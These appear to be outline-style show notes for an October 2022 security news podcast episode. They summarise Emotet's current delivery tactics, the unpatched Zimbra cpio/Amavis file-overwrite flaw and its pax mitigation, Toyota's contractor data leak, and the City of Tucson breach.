Episode 30: October 10 2022

Links

https://www.bleepingcomputer.com/news/security/hackers-exploiting-unpatched-rce-bug-in-zimbra-collaboration-suite/?&web_view=true
https://thehackernews.com/2022/10/new-report-uncovers-emotets-delivery.html
https://thehackernews.com/2022/10/hackers-exploiting-unpatched-rce-flaw.html
https://gizmodo.com/toyota-warns-customers-they-may-get-scam-emails-after-d-1849630698
https://www.bleepingcomputer.com/news/security/city-of-tucson-discloses-data-breach-affecting-over-123-000-people/

Emotet’s Current Tactics

  • Emotet
    • June 2014
      • Appeared as a banking trojan
    • 2016
      • All-purpose malware loaded including ransomware
    • Jan 2021
      • Infrastructure taken down by law enforcement
    • Currently
      • Being run by Mummy Spider (TA542)
    • Tactic
      • It’s been around because it’s versatile
      • Uses different attack vectors
      • Can hide for long periods of time.
      • Relies on emails with compromised attachments
    • Currently
      • VMware said 3 different attacks observed
        • Excel macro
        • Excel Macro with Powershell
        • Visual Basic Application with Powershell
        • Some used mshta.exe to launch malicious HTA file
        • ¼ of attacks come in excel documents
      • LOLBins
        • Popular tactic
          • MSHTA and Powershell
          • Signed by Microsoft
          • Trusted by Windows
        • March and June 2022
          • Utilizing the Epoch 5 command and control
          • New plugins
            • designed to capture credit card data from the Google Chrome browser
            • a spreader module that uses the SMB protocol for lateral movement
            • spamming module
            • account info stealer for Outlook and Thunderbird

Zimbra’s Unpatched RCE Flaw

  • Active Exploit (CVE-2022-41352)
    • CVSS 9.8
    • Allows malicious actor to upload files and other actions
    • Part of Zimbra’s antivirus engine
    • Sept 2022
      • No, fix yet
      • Urge to install the pax utility and restart
    • If the pax package is not installed, Amavis will fall back to using cpio
      • will allow an unauthenticated attacker to create and overwrite files on the Zimbra server
        • including the Zimbra webroot
      • Versions
        • 8.15 and 9.0
        • Linux Version
          • Oracle Linux 8
          • Red Hat Enterprise Linux 8
          • Rocky Linux 8
          • CentOS 8
          • Exception
            • Ubuntu
              • Pax is already installed by default
            • Tactic
              • email an archive file (CPIO or TAR) to a susceptible server
                • which is then inspected by Amavis using the cpio file archiver utility to extract its contents.
                • cpio has no mode where it can be securely used on untrusted files
                • an attacker can write to any path on the filesystem that the Zimbra user can access

Toyota Customers prepare for Phishing

  • Toyota
    • Customer information leaked
      • 296,000 pieces of customer information leaked
      • Toyota Smartphone App
    • Warned Customers
      • Risk of Pishing/Spam and emails
    • Leak
      • Customers who signed up starting July 2017
        • Using emails
      • Email addresses and customer numbers
      • No sensitive information
        • name, Phone Numbers of Credit Cards
        • Though can be tied together with other leaks online
      • No current reports of it being used
    • Contractor
      • Third-party
        • Uploaded source code with the data accidentally to a public server
        • No detected access at this time
        • Dec 2017 until Sept 2022

City of Tucson discloses data breach

  • City of Tucson
    • Data Breach
    • Personal Information
      • 123,000 people
      • names and Social Security numbers, driver’s license or state identification number, and passport number
    • Attack
      • May 17 and May 31
        • May 29 City learned of the malicious activity of user account
      • Aug 4
        • Learned that documents may have been copied
      • Sept 12
        • Review of information concluded and determined the information
      • Sept 23
        • Notification of residents
      • The attacker breached city’s network
      • Exfil a large number of files with sensitive information
    • No detected so far
      • No use of this information has been detected
      • 12 months of free access to Experian credit monitoring